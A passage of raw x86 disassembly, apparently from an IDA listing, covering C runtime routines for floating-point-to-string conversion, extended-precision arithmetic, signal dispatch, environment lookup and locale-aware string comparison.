cmp [ebp+arg_0], 0
jnz short loc_421A9E
push offset a1Inf ; "1#INF"
loc_421A86: ; CODE XREF: sub_4219A9+CC�j
lea eax, [ebx+4]
push eax
call sub_4179C0
pop ecx
mov byte ptr [ebx+3], 5
pop ecx
loc_421A95: ; CODE XREF: sub_4219A9+109�j
and [ebp+var_4], 0
jmp loc_421C0C
; ---------------------------------------------------------------------------
loc_421A9E: ; CODE XREF: sub_4219A9+C5�j
; sub_4219A9+D0�j ...
push offset a1Qnan ; "1#QNAN"
loc_421AA3: ; CODE XREF: sub_4219A9+B2�j
lea eax, [ebx+4]
push eax
call sub_4179C0
pop ecx
mov byte ptr [ebx+3], 6
pop ecx
jmp short loc_421A95
; ---------------------------------------------------------------------------
loc_421AB4: ; CODE XREF: sub_4219A9+8F�j
movzx eax, dx
mov ecx, edi
mov esi, eax
shr ecx, 18h
imul eax, 4D10h
shr esi, 8
and [ebp+var_10], 0
push 1
lea ecx, [esi+ecx*2]
mov [ebp+var_6], dx
imul ecx, 4Dh
mov [ebp+var_A], edi
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
sar esi, 10h
mov [ebp+var_E], eax
movsx eax, si
neg eax
push eax
lea eax, [ebp+var_10]
push eax
call sub_4220C1
add esp, 0Ch
cmp [ebp+var_6], 3FFFh
jb short loc_421B15
lea eax, [ebp+var_1C]
inc esi
push eax
lea eax, [ebp+var_10]
push eax
call sub_421EA1
pop ecx
pop ecx
loc_421B15: ; CODE XREF: sub_4219A9+15A�j
test [ebp+arg_10], 1
mov [ebx], si
jz short loc_421B2F
mov edi, [ebp+arg_C]
movsx eax, si
add edi, eax
test edi, edi
jg short loc_421B32
jmp loc_421A20
; ---------------------------------------------------------------------------
loc_421B2F: ; CODE XREF: sub_4219A9+173�j
mov edi, [ebp+arg_C]
loc_421B32: ; CODE XREF: sub_4219A9+17F�j
cmp edi, 15h
jle short loc_421B3A
push 15h
pop edi
loc_421B3A: ; CODE XREF: sub_4219A9+18C�j
movzx esi, [ebp+var_6]
sub esi, 3FFEh
and [ebp+var_6], 0
mov [ebp+arg_14], 8
loc_421B50: ; CODE XREF: sub_4219A9+1B4�j
lea eax, [ebp+var_10]
push eax
call sub_4213B6
dec [ebp+arg_14]
pop ecx
jnz short loc_421B50
test esi, esi
jge short loc_421B7A
neg esi
and esi, 0FFh
jle short loc_421B7A
loc_421B6D: ; CODE XREF: sub_4219A9+1CF�j
lea eax, [ebp+var_10]
push eax
call sub_4213E4
dec esi
pop ecx
jnz short loc_421B6D
loc_421B7A: ; CODE XREF: sub_4219A9+1B8�j
; sub_4219A9+1C2�j
lea ecx, [edi+1]
lea eax, [ebx+4]
test ecx, ecx
mov [ebp+arg_14], eax
jle short loc_421BD7
mov [ebp+arg_C], ecx
loc_421B8A: ; CODE XREF: sub_4219A9+229�j
lea esi, [ebp+var_10]
lea edi, [ebp+arg_0]
movsd
movsd
lea eax, [ebp+var_10]
push eax
movsd
call sub_4213B6
lea eax, [ebp+var_10]
push eax
call sub_4213B6
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_421358
lea eax, [ebp+var_10]
push eax
call sub_4213B6
mov al, byte ptr [ebp+var_6+1]
mov ecx, [ebp+arg_14]
and byte ptr [ebp+var_6+1], 0
add esp, 14h
add al, 30h
inc [ebp+arg_14]
dec [ebp+arg_C]
mov [ecx], al
jnz short loc_421B8A
mov eax, [ebp+arg_14]
loc_421BD7: ; CODE XREF: sub_4219A9+1DC�j
mov cl, [eax-1]
dec eax
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_421C14
loc_421BE4: ; CODE XREF: sub_4219A9+248�j
cmp eax, ecx
jb short loc_421BF7
cmp byte ptr [eax], 39h
jnz short loc_421BF3
mov byte ptr [eax], 30h
dec eax
jmp short loc_421BE4
; ---------------------------------------------------------------------------
loc_421BF3: ; CODE XREF: sub_4219A9+242�j
cmp eax, ecx
jnb short loc_421BFB
loc_421BF7: ; CODE XREF: sub_4219A9+23D�j
inc eax
inc word ptr [ebx]
loc_421BFB: ; CODE XREF: sub_4219A9+24C�j
inc byte ptr [eax]
loc_421BFD: ; CODE XREF: sub_4219A9+279�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_421C0C: ; CODE XREF: sub_4219A9+F0�j
mov eax, [ebp+var_4]
loc_421C0F: ; CODE XREF: sub_4219A9+291�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_421C14: ; CODE XREF: sub_4219A9+239�j
; sub_4219A9+275�j
cmp eax, ecx
jb short loc_421C24
cmp byte ptr [eax], 30h
jnz short loc_421C20
dec eax
jmp short loc_421C14
; ---------------------------------------------------------------------------
loc_421C20: ; CODE XREF: sub_4219A9+272�j
cmp eax, ecx
jnb short loc_421BFD
loc_421C24: ; CODE XREF: sub_4219A9+26D�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ecx], 30h
loc_421C33: ; CODE XREF: sub_4219A9+87�j
and byte ptr [ebx+5], 0
push 1
pop eax
jmp short loc_421C0F
sub_4219A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421C3C proc near ; CODE XREF: sub_41D4FC+342F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, edi
dec eax
dec eax
jz short loc_421CA3
dec eax
dec eax
jz short loc_421C94
sub eax, 4
jz short loc_421C94
sub eax, 3
jz short loc_421C94
sub eax, 4
jz short loc_421C87
sub eax, 6
jz short loc_421C7A
dec eax
jz short loc_421C6D
or eax, 0FFFFFFFFh
jmp loc_421D65
; ---------------------------------------------------------------------------
loc_421C6D: ; CODE XREF: sub_421C3C+27�j
mov esi, ds:dword_4CDC94
mov eax, offset dword_4CDC94
jmp short loc_421CAE
; ---------------------------------------------------------------------------
loc_421C7A: ; CODE XREF: sub_421C3C+24�j
mov esi, ds:dword_4CDC90
mov eax, offset dword_4CDC90
jmp short loc_421CAE
; ---------------------------------------------------------------------------
loc_421C87: ; CODE XREF: sub_421C3C+1F�j
mov esi, ds:dword_4CDC98
mov eax, offset dword_4CDC98
jmp short loc_421CAE
; ---------------------------------------------------------------------------
loc_421C94: ; CODE XREF: sub_421C3C+10�j
; sub_421C3C+15�j ...
push edi
call sub_421D69
mov esi, [eax+8]
add eax, 8
pop ecx
jmp short loc_421CAE
; ---------------------------------------------------------------------------
loc_421CA3: ; CODE XREF: sub_421C3C+C�j
mov esi, ds:dword_4CDC8C
mov eax, offset dword_4CDC8C
loc_421CAE: ; CODE XREF: sub_421C3C+3C�j
; sub_421C3C+49�j ...
cmp esi, 1
jnz short loc_421CBA
xor eax, eax
jmp loc_421D65
; ---------------------------------------------------------------------------
loc_421CBA: ; CODE XREF: sub_421C3C+75�j
test esi, esi
jnz short loc_421CC5
push 3
call sub_419AF6
loc_421CC5: ; CODE XREF: sub_421C3C+80�j
push ebx
push 8
pop ecx
cmp edi, ecx
jz short loc_421CD7
cmp edi, 0Bh
jz short loc_421CD7
cmp edi, 4
jnz short loc_421CFD
loc_421CD7: ; CODE XREF: sub_421C3C+8F�j
; sub_421C3C+94�j
mov ebx, ds:dword_4CDA68
and ds:dword_4CDA68, 0
cmp edi, ecx
jnz short loc_421D2C
mov edx, ds:dword_4362EC
mov ds:dword_4362EC, 8Ch
mov [ebp+arg_0], edx
jmp short loc_421D00
; ---------------------------------------------------------------------------
loc_421CFD: ; CODE XREF: sub_421C3C+99�j
mov ebx, [ebp+arg_0]
loc_421D00: ; CODE XREF: sub_421C3C+BF�j
cmp edi, ecx
jnz short loc_421D2C
mov eax, ds:dword_4362E0
mov ecx, ds:dword_4362E4
add ecx, eax
cmp eax, ecx
jge short loc_421D33
lea edx, [eax+eax*2]
sub ecx, eax
lea edx, ds:436270h[edx*4]
loc_421D21: ; CODE XREF: sub_421C3C+EC�j
and dword ptr [edx], 0
add edx, 0Ch
dec ecx
jnz short loc_421D21
jmp short loc_421D33
; ---------------------------------------------------------------------------
loc_421D2C: ; CODE XREF: sub_421C3C+AA�j
; sub_421C3C+C6�j
and dword ptr [eax], 0
cmp edi, ecx
jnz short loc_421D41
loc_421D33: ; CODE XREF: sub_421C3C+D7�j
; sub_421C3C+EE�j
push ds:dword_4362EC
push 8
call esi
pop ecx
pop ecx
jmp short loc_421D4F
; ---------------------------------------------------------------------------
loc_421D41: ; CODE XREF: sub_421C3C+F5�j
push edi
call esi
cmp edi, 0Bh
pop ecx
jz short loc_421D4F
cmp edi, 4
jnz short loc_421D62
loc_421D4F: ; CODE XREF: sub_421C3C+103�j
; sub_421C3C+10C�j
cmp edi, 8
mov ds:dword_4CDA68, ebx
jnz short loc_421D62
mov eax, [ebp+arg_0]
mov ds:dword_4362EC, eax
loc_421D62: ; CODE XREF: sub_421C3C+111�j
; sub_421C3C+11C�j
xor eax, eax
pop ebx
loc_421D65: ; CODE XREF: sub_421C3C+2C�j
; sub_421C3C+79�j
pop edi
pop esi
pop ebp
retn
sub_421C3C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421D69 proc near ; CODE XREF: sub_421C3C+59�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, ds:dword_4362E8
cmp ds:dword_43626C, edx
push esi
mov eax, offset dword_436268
jz short loc_421D97
lea esi, [ecx+ecx*2]
lea esi, ds:436268h[esi*4]
loc_421D8B: ; CODE XREF: sub_421D69+2C�j
add eax, 0Ch
cmp eax, esi
jnb short loc_421D97
cmp [eax+4], edx
jnz short loc_421D8B
loc_421D97: ; CODE XREF: sub_421D69+16�j
; sub_421D69+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:436268h[ecx*4]
cmp eax, ecx
jnb short loc_421DAB
cmp [eax+4], edx
jz short locret_421DAD
loc_421DAB: ; CODE XREF: sub_421D69+3B�j
xor eax, eax
locret_421DAD: ; CODE XREF: sub_421D69+40�j
retn
sub_421D69 endp
; =============== S U B R O U T I N E =======================================
sub_421DAE proc near ; CODE XREF: sub_42094E+23�p
arg_0 = dword ptr 4
cmp ds:dword_4CF030, 0
push ebx
push esi
mov esi, ds:dword_4CD9DC
push edi
jz short loc_421E25
test esi, esi
jnz short loc_421DDF
cmp ds:dword_4CD9E4, esi
jz short loc_421E25
call sub_42217C
test eax, eax
jnz short loc_421E25
mov esi, ds:dword_4CD9DC
test esi, esi
jz short loc_421E25
loc_421DDF: ; CODE XREF: sub_421DAE+14�j
mov ebx, [esp+0Ch+arg_0]
test ebx, ebx
jz short loc_421E25
push ebx
call sub_417AB0
pop ecx
mov edi, eax
loc_421DF0: ; CODE XREF: sub_421DAE+6D�j
mov eax, [esi]
test eax, eax
jz short loc_421E25
push eax
call sub_417AB0
cmp eax, edi
pop ecx
jbe short loc_421E18
mov eax, [esi]
cmp byte ptr [eax+edi], 3Dh
jnz short loc_421E18
push edi
push ebx
push eax
call sub_42213D
add esp, 0Ch
test eax, eax
jz short loc_421E1D
loc_421E18: ; CODE XREF: sub_421DAE+51�j
; sub_421DAE+59�j
add esi, 4
jmp short loc_421DF0
; ---------------------------------------------------------------------------
loc_421E1D: ; CODE XREF: sub_421DAE+68�j
mov eax, [esi]
lea eax, [eax+edi+1]
jmp short loc_421E27
; ---------------------------------------------------------------------------
loc_421E25: ; CODE XREF: sub_421DAE+10�j
; sub_421DAE+1C�j ...
xor eax, eax
loc_421E27: ; CODE XREF: sub_421DAE+75�j
pop edi
pop esi
pop ebx
retn
sub_421DAE endp
; =============== S U B R O U T I N E =======================================
sub_421E2B proc near ; CODE XREF: sub_4211F1+8B�p
; sub_4211F1+D9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, ds:dword_4CEDE0
jnb short loc_421E92
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_4CECE0[ecx*4]
lea edx, [ecx+eax*8+4]
mov cl, [ecx+eax*8+4]
test cl, 1
jz short loc_421E92
mov al, cl
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_421E6B
and cl, 7Fh
jmp short loc_421E78
; ---------------------------------------------------------------------------
loc_421E6B: ; CODE XREF: sub_421E2B+39�j
cmp [esp+4+arg_4], 4000h
jnz short loc_421E86
or cl, 80h
loc_421E78: ; CODE XREF: sub_421E2B+3E�j
neg eax
sbb eax, eax
mov [edx], cl
and ax, 0C000h
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_421E86: ; CODE XREF: sub_421E2B+48�j
mov ds:dword_4CD9B4, 16h
jmp short loc_421E9C
; ---------------------------------------------------------------------------
loc_421E92: ; CODE XREF: sub_421E2B+B�j
; sub_421E2B+27�j
mov ds:dword_4CD9B4, 9
loc_421E9C: ; CODE XREF: sub_421E2B+65�j
or eax, 0FFFFFFFFh
pop esi
retn
sub_421E2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421EA1 proc near ; CODE XREF: sub_4219A9+165�p
; sub_4220C1+69�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov cx, [ebx+0Ah]
xor eax, eax
push edi
mov [ebp+var_14], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
mov ax, [esi+0Ah]
mov edi, ecx
mov edx, 7FFFh
xor edi, eax
and eax, edx
and ecx, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_4220A1
cmp cx, 7FFFh
jnb loc_4220A1
cmp dx, 0BFFDh
ja loc_4220A1
cmp dx, 3FBFh
ja short loc_421F0A
xor eax, eax
jmp short loc_421F44
; ---------------------------------------------------------------------------
loc_421F0A: ; CODE XREF: sub_421EA1+63�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_421F2C
inc [ebp+arg_0]
test [esi+8], edx
jnz short loc_421F2C
xor eax, eax
cmp [esi+4], eax
jnz short loc_421F2E
cmp [esi], eax
jnz short loc_421F2E
jmp loc_42209B
; ---------------------------------------------------------------------------
loc_421F2C: ; CODE XREF: sub_421EA1+71�j
; sub_421EA1+79�j
xor eax, eax
loc_421F2E: ; CODE XREF: sub_421EA1+80�j
; sub_421EA1+84�j
cmp cx, ax
jnz short loc_421F51
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_421F51
cmp [ebx+4], eax
jnz short loc_421F51
cmp [ebx], eax
jnz short loc_421F51
loc_421F44: ; CODE XREF: sub_421EA1+67�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_4220BC
; ---------------------------------------------------------------------------
loc_421F51: ; CODE XREF: sub_421EA1+90�j
; sub_421EA1+98�j ...
mov [ebp+var_10], eax
lea eax, [ebp+var_20]
mov [ebp+var_4], eax
mov [ebp+arg_4], 5
loc_421F61: ; CODE XREF: sub_421EA1+122�j
mov eax, [ebp+var_10]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_421FB5
add eax, esi
lea ecx, [ebx+8]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], ecx
mov [ebp+var_18], eax
loc_421F7D: ; CODE XREF: sub_421EA1+112�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
movzx eax, word ptr [eax]
movzx ecx, word ptr [ecx]
imul eax, ecx
mov ecx, [ebp+var_4]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_421337
add esp, 0Ch
test eax, eax
jz short loc_421FA8
mov eax, [ebp+var_4]
inc word ptr [eax]
loc_421FA8: ; CODE XREF: sub_421EA1+FF�j
add [ebp+var_8], 2
sub [ebp+var_C], 2
dec [ebp+var_18]
jnz short loc_421F7D
loc_421FB5: ; CODE XREF: sub_421EA1+C9�j
add [ebp+var_4], 2
inc [ebp+var_10]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_421F61
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_421FF8
loc_421FD3: ; CODE XREF: sub_421EA1+14E�j
test byte ptr [ebp+var_1C+3], 80h
jnz short loc_421FF1
lea eax, [ebp+var_24]
push eax
call sub_4213B6
add [ebp+arg_0], 0FFFFh
pop ecx
cmp word ptr [ebp+arg_0], 0
jg short loc_421FD3
loc_421FF1: ; CODE XREF: sub_421EA1+136�j
cmp word ptr [ebp+arg_0], 0
jg short loc_422031
loc_421FF8: ; CODE XREF: sub_421EA1+130�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_422031
movsx eax, word ptr [ebp+arg_0]
neg eax
add [ebp+arg_0], eax
mov ebx, eax
loc_422011: ; CODE XREF: sub_421EA1+184�j
test byte ptr [ebp+var_24], 1
jz short loc_42201A
inc [ebp+var_14]
loc_42201A: ; CODE XREF: sub_421EA1+174�j
lea eax, [ebp+var_24]
push eax
call sub_4213E4
dec ebx
pop ecx
jnz short loc_422011
cmp [ebp+var_14], 0
jz short loc_422031
or byte ptr [ebp+var_24], 1
loc_422031: ; CODE XREF: sub_421EA1+155�j
; sub_421EA1+163�j ...
cmp word ptr [ebp+var_24], 8000h
ja short loc_422048
mov eax, [ebp+var_24]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_42207D
loc_422048: ; CODE XREF: sub_421EA1+196�j
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_42207A
and [ebp+var_24+2], 0
cmp [ebp+var_20+2], 0FFFFFFFFh
jnz short loc_422075
and [ebp+var_20+2], 0
cmp word ptr [ebp+var_1C+2], 0FFFFh
jnz short loc_42206F
inc [ebp+arg_0]
mov word ptr [ebp+var_1C+2], 8000h
jmp short loc_42207D
; ---------------------------------------------------------------------------
loc_42206F: ; CODE XREF: sub_421EA1+1C1�j
inc word ptr [ebp+var_1C+2]
jmp short loc_42207D
; ---------------------------------------------------------------------------
loc_422075: ; CODE XREF: sub_421EA1+1B5�j
inc [ebp+var_20+2]
jmp short loc_42207D
; ---------------------------------------------------------------------------
loc_42207A: ; CODE XREF: sub_421EA1+1AB�j
inc [ebp+var_24+2]
loc_42207D: ; CODE XREF: sub_421EA1+1A5�j
; sub_421EA1+1CC�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_4220A1
mov cx, word ptr [ebp+var_24+2]
or eax, edi
mov [esi], cx
mov ecx, [ebp+var_20]
mov [esi+2], ecx
mov ecx, [ebp+var_1C]
mov [esi+6], ecx
loc_42209B: ; CODE XREF: sub_421EA1+86�j
mov [esi+0Ah], ax
jmp short loc_4220BC
; ---------------------------------------------------------------------------
loc_4220A1: ; CODE XREF: sub_421EA1+42�j
; sub_421EA1+4D�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_4220BC: ; CODE XREF: sub_421EA1+AB�j
; sub_421EA1+1FE�j
pop edi
pop esi
pop ebx
leave
retn
sub_421EA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4220C1 proc near ; CODE XREF: sub_4214D8+440�p
; sub_4219A9+14C�p
var_C = byte ptr -0Ch
var_A = dword ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ebx, offset dword_436760
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
jz short loc_42213A
jge short loc_4220E9
mov eax, [ebp+arg_4]
mov ebx, offset dword_4368C0
neg eax
mov [ebp+arg_4], eax
sub ebx, 60h
loc_4220E9: ; CODE XREF: sub_4220C1+16�j
cmp [ebp+arg_8], ecx
jnz short loc_4220F4
mov eax, [ebp+arg_0]
mov [eax], cx
loc_4220F4: ; CODE XREF: sub_4220C1+2B�j
cmp [ebp+arg_4], ecx
jz short loc_42213A
push esi
push edi
loc_4220FB: ; CODE XREF: sub_4220C1+75�j
mov eax, [ebp+arg_4]
add ebx, 54h
sar [ebp+arg_4], 3
and eax, 7
cmp eax, ecx
jz short loc_422133
lea eax, [eax+eax*2]
cmp word ptr [ebx+eax*4], 8000h
lea esi, [ebx+eax*4]
jb short loc_422126
lea edi, [ebp+var_C]
movsd
movsd
movsd
dec [ebp+var_A]
lea esi, [ebp+var_C]
loc_422126: ; CODE XREF: sub_4220C1+57�j
push esi
push [ebp+arg_0]
call sub_421EA1
pop ecx
pop ecx
xor ecx, ecx
loc_422133: ; CODE XREF: sub_4220C1+49�j
cmp [ebp+arg_4], ecx
jnz short loc_4220FB
pop edi
pop esi
loc_42213A: ; CODE XREF: sub_4220C1+14�j
; sub_4220C1+36�j
pop ebx
leave
retn
sub_4220C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42213D proc near ; CODE XREF: sub_421DAE+5E�p
; sub_422619+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jnz short loc_42214A
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42214A: ; CODE XREF: sub_42213D+7�j
push ds:dword_4CEDE4
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_8]
push [ebp+arg_0]
push 1
push ds:dword_4CF004
call sub_4221EA
add esp, 1Ch
test eax, eax
jnz short loc_422177
mov eax, 7FFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_422177: ; CODE XREF: sub_42213D+31�j
add eax, 0FFFFFFFEh
pop ebp
retn
sub_42213D endp
; =============== S U B R O U T I N E =======================================
sub_42217C proc near ; CODE XREF: sub_421DAE+1E�p
; sub_422492+5B�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
mov esi, ds:dword_4CD9E4
push edi
xor edi, edi
mov eax, [esi]
cmp eax, edi
jz short loc_4221DD
mov ebx, ds:dword_424150
loc_422195: ; CODE XREF: sub_42217C+5F�j
push edi
push edi
push edi
push edi
push 0FFFFFFFFh
push eax
push edi
push 1
call ebx ; WideCharToMultiByte
mov ebp, eax
cmp ebp, edi
jz short loc_4221E5
push ebp
call sub_417B89
cmp eax, edi
pop ecx
mov [esp+14h+var_4], eax
jz short loc_4221E5
push edi
push edi
push ebp
push eax
push 0FFFFFFFFh
push dword ptr [esi]
push edi
push 1
call ebx ; WideCharToMultiByte
test eax, eax
jz short loc_4221E5
push edi
push [esp+18h+var_4]
call sub_422492
mov eax, [esi+4]
add esi, 4
pop ecx
cmp eax, edi
pop ecx
jnz short loc_422195
loc_4221DD: ; CODE XREF: sub_42217C+11�j
xor eax, eax
loc_4221DF: ; CODE XREF: sub_42217C+6C�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4221E5: ; CODE XREF: sub_42217C+29�j
; sub_42217C+38�j ...
or eax, 0FFFFFFFFh
jmp short loc_4221DF
sub_42217C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4221EA proc near ; CODE XREF: sub_42213D+27�p
var_3C = dword ptr -3Ch
var_36 = byte ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_424C88
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
cmp ds:dword_4CDCA0, ebx
push 1
pop edi
jnz short loc_42225D
push edi
mov eax, offset dword_4248D8
push eax
push edi
push eax
push ebx
push ebx
call ds:dword_424008 ;; CompareStringW
test eax, eax
jz short loc_42223A
mov ds:dword_4CDCA0, edi
jmp short loc_42225D
; ---------------------------------------------------------------------------
loc_42223A: ; CODE XREF: sub_4221EA+46�j
push edi
mov eax, offset dword_436EF4
push eax
push edi
push eax
push ebx
push ebx
call ds:dword_42400C ;; CompareStringA
test eax, eax
jz loc_422453
mov ds:dword_4CDCA0, 2
loc_42225D: ; CODE XREF: sub_4221EA+31�j
; sub_4221EA+4E�j
mov esi, [ebp+arg_C]
cmp esi, ebx
jle short loc_422274
push esi
push [ebp+arg_8]
call sub_422467
pop ecx
pop ecx
mov esi, eax
mov [ebp+arg_C], esi
loc_422274: ; CODE XREF: sub_4221EA+78�j
cmp [ebp+arg_14], ebx
jle short loc_422289
push [ebp+arg_14]
push [ebp+arg_10]
call sub_422467
pop ecx
pop ecx
mov [ebp+arg_14], eax
loc_422289: ; CODE XREF: sub_4221EA+8D�j
mov eax, ds:dword_4CDCA0
cmp eax, 2
jnz short loc_4222AE
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_42400C ;; CompareStringA
jmp loc_422455
; ---------------------------------------------------------------------------
loc_4222AE: ; CODE XREF: sub_4221EA+A7�j
cmp eax, edi
jnz loc_422453
cmp [ebp+arg_18], ebx
jnz short loc_4222C3
mov eax, ds:dword_4CDA58
mov [ebp+arg_18], eax
loc_4222C3: ; CODE XREF: sub_4221EA+CF�j
cmp esi, ebx
jz short loc_4222D0
cmp [ebp+arg_14], ebx
jnz loc_422368
loc_4222D0: ; CODE XREF: sub_4221EA+DB�j
cmp esi, [ebp+arg_14]
jnz short loc_4222DD
loc_4222D5: ; CODE XREF: sub_4221EA+13C�j
; sub_4221EA+16D�j
push 2
loc_4222D7: ; CODE XREF: sub_4221EA+146�j
pop eax
jmp loc_422455
; ---------------------------------------------------------------------------
loc_4222DD: ; CODE XREF: sub_4221EA+E9�j
cmp [ebp+arg_14], edi
jle short loc_4222E9
loc_4222E2: ; CODE XREF: sub_4221EA+151�j
; sub_4221EA+159�j ...
mov eax, edi
jmp loc_422455
; ---------------------------------------------------------------------------
loc_4222E9: ; CODE XREF: sub_4221EA+F6�j
cmp esi, edi
jg short loc_42232E
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_18]
call ds:dword_4241CC ;; GetCPInfo
test eax, eax
jz loc_422453
cmp esi, ebx
jle short loc_422332
cmp [ebp+var_3C], 2
jb short loc_42232E
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_42232E
loc_422314: ; CODE XREF: sub_4221EA+142�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_42232E
mov ecx, [ebp+arg_8]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_422328
cmp cl, dl
jbe short loc_4222D5
loc_422328: ; CODE XREF: sub_4221EA+138�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_422314
loc_42232E: ; CODE XREF: sub_4221EA+101�j
; sub_4221EA+120�j ...
push 3
jmp short loc_4222D7
; ---------------------------------------------------------------------------
loc_422332: ; CODE XREF: sub_4221EA+11A�j
cmp [ebp+arg_14], ebx
jle short loc_422368
cmp [ebp+var_3C], 2
jb short loc_4222E2
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_4222E2
loc_422345: ; CODE XREF: sub_4221EA+177�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_4222E2
mov ecx, [ebp+arg_10]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_42235D
cmp cl, dl
jbe loc_4222D5
loc_42235D: ; CODE XREF: sub_4221EA+169�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_422345
jmp loc_4222E2
; ---------------------------------------------------------------------------
loc_422368: ; CODE XREF: sub_4221EA+E0�j
; sub_4221EA+14B�j
push ebx
push ebx
push esi
push [ebp+arg_8]
push 9
push [ebp+arg_18]
call ds:dword_424070 ;; MultiByteToWideChar
mov [ebp+var_1C], eax
cmp eax, ebx
jz loc_422453
mov [ebp+var_4], ebx
add eax, eax
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4223B7
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+arg_C]
push 1
pop edi
loc_4223B7: ; CODE XREF: sub_4221EA+1B5�j
cmp [ebp+var_24], ebx
jz loc_422453
push [ebp+var_1C]
push [ebp+var_24]
push esi
push [ebp+arg_8]
push edi
push [ebp+arg_18]
mov esi, ds:dword_424070
call esi ; MultiByteToWideChar
test eax, eax
jz short loc_422453
push ebx
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push 9
push [ebp+arg_18]
call esi ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_20], esi
cmp esi, ebx
jz short loc_422453
mov [ebp+var_4], edi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov edi, esp
mov [ebp+var_28], edi
